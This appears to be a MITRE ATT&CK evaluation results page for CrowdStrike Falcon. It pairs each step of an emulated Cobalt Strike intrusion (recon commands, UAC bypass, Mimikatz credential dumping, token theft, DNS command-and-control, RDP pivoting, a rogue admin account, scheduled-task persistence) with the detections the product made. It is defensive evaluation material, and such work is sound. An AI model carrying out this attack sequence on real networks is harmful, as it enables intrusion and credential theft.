Tags: Prevent, Insight, Overwatch, Endpoint Protection Standard Bundle, Falcon, CrowdStrike

CrowdStrike Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Legend

Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment
Detection Modifiers: Tainted, Delayed, Configuration Change

Results table (columns: Step, Procedure, Technique, Detection Type, Detection Notes, Screenshots)

Step 1.A.1
Procedure: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

Technique: User Execution (T1204)
  Detection Type: General Behavior
  Detection Notes: A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious.
  Detection Type: Telemetry
  Detection Notes: Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Screenshot: Machine Learning General Behavior alert showing execution of Resume Viewer.exe and detection as malicious

Technique: Rundll32 (T1085)
  Detection Type: Specific Behavior
  Detection Notes: A Specific Behavior alert was generated because rundll32 launched a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion).
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch generated a General Behavior alert indicating that rundll32 executing update.dat was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: Telemetry
  Detection Notes: Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Screenshot: Specific Behavior alert showing rundll32 execution (mapped to the correct ATT&CK Technique, Rundll32, and Tactic, Defense Evasion; the green arrow indicates injection)
  Screenshot: OverWatch General Behavior alert indicating rundll32 execution was suspicious

Technique: Scripting (T1064)
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: Telemetry
  Detection Notes: Telemetry showed pdfhelper.cmd being executed by cmd.exe.
  Screenshot: OverWatch General Behavior alert indicating pdfhelper.cmd execution was suspicious
  Screenshot: Telemetry showing pdfhelper.cmd execution

Step 1.B.1
Procedure: Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

Technique: Registry Run Keys / Startup Folder (T1060)
  Detection Type: Telemetry
  Detection Notes: Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data may be indicative of modifications to the folder.
  Screenshot: Telemetry showing Registry modification related to Startup Folder

Step 1.C.1
Procedure: Cobalt Strike: C2 channel established

Technique: Commonly Used Port (T1043)
  Detection Type: None
  Detection Notes: No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically).
  Screenshot: OverWatch alert showing suspicious DNS traffic (does not count as a detection)

Technique: Data Encoding (T1132)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert.
  Screenshot: Telemetry within an alert showing encoded DNS requests (tainted by parent Exfiltration alert)

Technique: Standard Application Layer Protocol (T1071)
  Detection Type: Specific Behavior
  Detection Notes: A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration).
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: Telemetry
  Detection Notes: Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Detection Type: Specific Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Specific Behavior alert showing abnormally large DNS requests (mapped to the related ATT&CK Technique, Exfiltration Over Alternative Protocol, and Tactic, Exfiltration) and OverWatch General Behavior alert indicating that the traffic was suspicious
  Screenshot: Telemetry showing DNS requests
  Screenshot: Email excerpt from the OverWatch team indicating they observed suspected command and control or data exfiltration via DNS (Specific Behavior)

Step 2.A.1
Procedure: Cobalt Strike: 'ipconfig /all' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing ipconfig with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (ipconfig not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating ipconfig was a reconnaissance command (General Behavior)

Step 2.A.2
Procedure: Cobalt Strike: 'arp -a' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing arp with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (arp not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating arp was a reconnaissance command (General Behavior)

Step 2.B.1
Procedure: Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

Technique: System Owner / User Discovery (T1033)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing echo with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (echo not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating echo was a reconnaissance command (General Behavior)

Step 2.C.1
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs

Technique: Process Discovery (T1057)
  Detection Type: None
  Detection Notes: No detection capability demonstrated for this procedure.

Step 2.C.2
Procedure: Cobalt Strike: 'tasklist /v' via cmd

Technique: Process Discovery (T1057)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing tasklist with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (tasklist not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating tasklist was a reconnaissance command (General Behavior)

Step 2.D.1
Procedure: Cobalt Strike: 'sc query' via cmd

Technique: System Service Discovery (T1007)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing sc with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (sc query not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating sc query was a reconnaissance command (General Behavior)

Step 2.D.2
Procedure: Cobalt Strike: 'net start' via cmd

Technique: System Service Discovery (T1007)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net start not specifically shown)

Step 2.E.1
Procedure: Cobalt Strike: 'systeminfo' via cmd

Technique: System Information Discovery (T1082)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing systeminfo
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (systeminfo not specifically shown)
  Screenshot: OverWatch General Behavior alert indicating systeminfo.exe was suspicious
  Screenshot: Email excerpt from the OverWatch team indicating systeminfo was a reconnaissance command (General Behavior)

Step 2.E.2
Procedure: Cobalt Strike: 'net config workstation' via cmd

Technique: System Information Discovery (T1082)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net config not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating net config was a reconnaissance command (General Behavior)

Step 2.F.1
Procedure: Cobalt Strike: 'net localgroup administrators' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net localgroup not specifically shown)
  Screenshot: OverWatch General Behavior alert for net localgroup
  Screenshot: Email excerpt from the OverWatch team indicating net localgroup was a reconnaissance command (General Behavior)

Step 2.F.2
Procedure: Cobalt Strike: 'net localgroup administrators /domain' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net localgroup not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating net localgroup was a reconnaissance command (General Behavior)

Step 2.F.3
Procedure: Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection Type: Enrichment (Tainted)
  Detection Notes: The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection.
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted by orange line for medium severity from previous detection)
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe (including net group) as tainted by orange line for medium severity
  Screenshot: Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)

Step 2.G.1
Procedure: Cobalt Strike: 'net user /domain' via cmd

Technique: Account Discovery (T1087)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net user not specifically shown)

Step 2.G.2
Procedure: Cobalt Strike: 'net user george /domain' via cmd

Technique: Account Discovery (T1087)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing net with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net user not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating net user was a reconnaissance command (General Behavior)

Step 2.H.1
Procedure: Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Technique: Query Registry (T1012)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Telemetry showing reg with command-line arguments
  Screenshot: Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (reg query not specifically shown)
  Screenshot: Email excerpt from the OverWatch team indicating reg query was a reconnaissance command (General Behavior)

Step 3.A.1
Procedure: Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

Technique: Access Token Manipulation (T1134)
  Detection Type: None
  Detection Notes: No detection capability demonstrated for this procedure.

Technique: Bypass User Account Control (T1088)
  Detection Type: Telemetry
  Detection Notes: Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC.
  Screenshot: Telemetry showing process integrity level change for Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High)

Step 3.B.1
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs

Technique: Process Discovery (T1057)
  Detection Type: None
  Detection Notes: No detection capability demonstrated for this procedure.

Step 3.C.1
Procedure: Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Technique: Process Injection (T1055)
  Detection Type: Specific Behavior (Tainted)
  Detection Notes: A Specific Behavior alert was generated showing that PowerShell created a thread in a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections.
  Detection Type: Telemetry
  Detection Notes: Telemetry associated with the alert would show the thread creation in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Detection Type: General Behavior (Delayed, Tainted)
  Detection Notes: OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections. OverWatch is the managed threat hunting service.
  Screenshot: Specific Behavior Process Injection alert mapped to the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion), as well as OverWatch General Behavior alert identifying the behavior as suspicious
  Screenshot: Telemetry showing process tree view of the Process Injection Specific Behavior alert and OverWatch General Behavior alert tainted by parent detections (orange line indicates medium severity)

Step 4.A.1
Procedure: Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

Technique: Remote System Discovery (T1018)
  Detection Type: Enrichment
  Detection Notes: The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery).
  Detection Type: Telemetry
  Detection Notes: Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious. OverWatch is the managed threat hunting service.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery)
  Screenshot: Additional process tree view showing net.exe enrichment
  Screenshot: OverWatch General Behavior alert for net group
  Screenshot: Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)

Step 4.A.2
Procedure: Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

Technique: Remote System Discovery (T1018)
  Detection Type: Enrichment
  Detection Notes: The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery).
  Detection Type: Telemetry
  Detection Notes: Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team identified net group as suspicious with a General Behavior alert. OverWatch is the managed threat hunting service.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery)
  Screenshot: Additional process tree view showing net.exe enrichment
  Screenshot: OverWatch General Behavior alert for net group
  Screenshot: Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)

Step 4.B.1
Procedure: Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: Telemetry
  Detection Notes: Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: OverWatch General Behavior alert indicating netsh execution by cmd.exe was suspicious
  Screenshot: Email excerpt from the OverWatch team indicating netsh was a reconnaissance command (General Behavior)

Step 4.C.1
Procedure: Cobalt Strike: 'netstat -ano' via cmd

Technique: System Network Connections Discovery (T1049)
  Detection Type: General Behavior (Delayed)
  Detection Notes: OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious. OverWatch is the managed threat hunting service.
  Detection Type: Telemetry
  Detection Notes: Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Detection Type: General Behavior (Delayed)
  Detection Notes: The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
  Screenshot: OverWatch General Behavior alert indicating netstat execution by cmd.exe was suspicious
  Screenshot: Email excerpt from the OverWatch team indicating netstat was a reconnaissance command (General Behavior)

Step 5.A.1
Procedure: Cobalt Strike: Built-in Mimikatz credential dump capability executed

Technique: Credential Dumping (T1003)
  Detection Type: Specific Behavior (Tainted)
  Detection Notes: A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
  Detection Type: Telemetry
  Detection Notes: Telemetry showing the lsass handle open and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Detection Type: General Behavior (Delayed, Tainted)
  Detection Notes: A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection. OverWatch is the managed threat hunting service.
  Screenshot: Specific Behavior alert for Credential Dumping and OverWatch General Behavior alert (tainted by previous detection; orange line indicates medium severity)

Technique: Process Injection (T1055)
  Detection Type: Enrichment
  Detection Notes: The capability enriched several event types with descriptions, including a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an lsass process being accessed (ProcessHollowingDetected).
  Screenshot: Enrichment showing ReflectiveDllOpenLsass and ProcessHollowingDetected events

Step 5.A.2
Procedure: Cobalt Strike: Built-in hash dump capability executed

Technique: Credential Dumping (T1003)
  Detection Type: Specific Behavior (Tainted)
  Detection Notes: A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
  Detection Type: Specific Behavior (Tainted)
  Detection Notes: A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
  Detection Type: Telemetry
  Detection Notes: Telemetry for the lsass remote thread and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
  Detection Type: General Behavior (Delayed, Tainted)
  Detection Notes: OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection. OverWatch is the managed threat hunting service.
  Screenshot: Two Specific Behavior alerts for Credential Dumping (mapped to the correct ATT&CK Technique, Credential Dumping, and Tactic, Credential Access) and General Behavior OverWatch alert
  Screenshot: Process tree view of Specific Behavior alerts for Credential Dumping and OverWatch General Behavior alert (tainted by previous detection; orange line indicates medium severity)

Technique: Process Injection (T1055)
  Detection Type: Enrichment
  Detection Notes: The capability enriched several event types with descriptions, including a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode).
  Screenshot: Enrichment showing ReflectiveDllOpenLsass, ProcessHollowingDetected, and LsassInjectedCode events

Step 5.B.1
Procedure: Cobalt Strike: Built-in token theft capability executed to change user context to George

Technique: Access Token Manipulation (T1134)
  Detection Type: Telemetry
  Detection Notes: Telemetry showed the compromised process (21898821890) running as Debbie, then children of this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process.
  Screenshot: Telemetry showing children of the compromised process (PID 21898821890) first running as Debbie, then as George

Step 6.A.1
Procedure: Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

Technique: Query Registry (T1012)
  Detection Type: Telemetry (Tainted)
  Detection Notes: Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process.
  Detection Type: General Behavior (Delayed, Tainted)
  Detection Notes: OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process. OverWatch is the managed threat hunting service.
  Screenshot: Telemetry showing reg with command-line arguments
  Screenshot: OverWatch General Behavior alert identifying reg query as suspicious, as well as the reg.exe process (tainted by previous detection; orange line indicates medium severity)

6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server).
Telemetry showing TCP port 80 connection to 192.168.0.4 (C2 server)
Multiband Communication
(T1026)
Telemetry (Tainted)
  
 
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert.
Telemetry within an alert showing abnormally large DNS requests occurred (tainted by parent Exfiltration alert)
Telemetry showing TCP port 80 connection to 192.168.0.4 (C2 server)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically).
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing logon type 10 (interactive remote login) as user George@shockwave on 10.0.0.5 (Conficker)
Telemetry showing a network connection to 10.0.0.5 (Conficker) over TCP port 3389
Email excerpt from the OverWatch team indicating suspicious communications over 3389 (RDP) were observed (General Behavior)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
  
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group.
Telemetry showing creation of the user Jesse with the user RID 000003E8
Telemetry showing user RID 000003E8 (corresponding to the user Jesse) added to the admin group (00000220), a well-known security identifier
Telemetry showing group membership of the user Jesse, including Remote (0000022B), Admins (00000220), and Users (00000221), which are well-known security identifiers
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe running lusrmgr.msc
Account Discovery
(T1087)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Telemetry showing mmc.exe running lusrmgr.msc
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent "unexpected process" alert.
Telemetry showing file write for updater.dll (tainted by the parent "unexpected process" alert)
Additional telemetry showing file write for updater.dll
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed the creation of the scheduled task.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service.
Specific Behavior (Delayed)
  
 
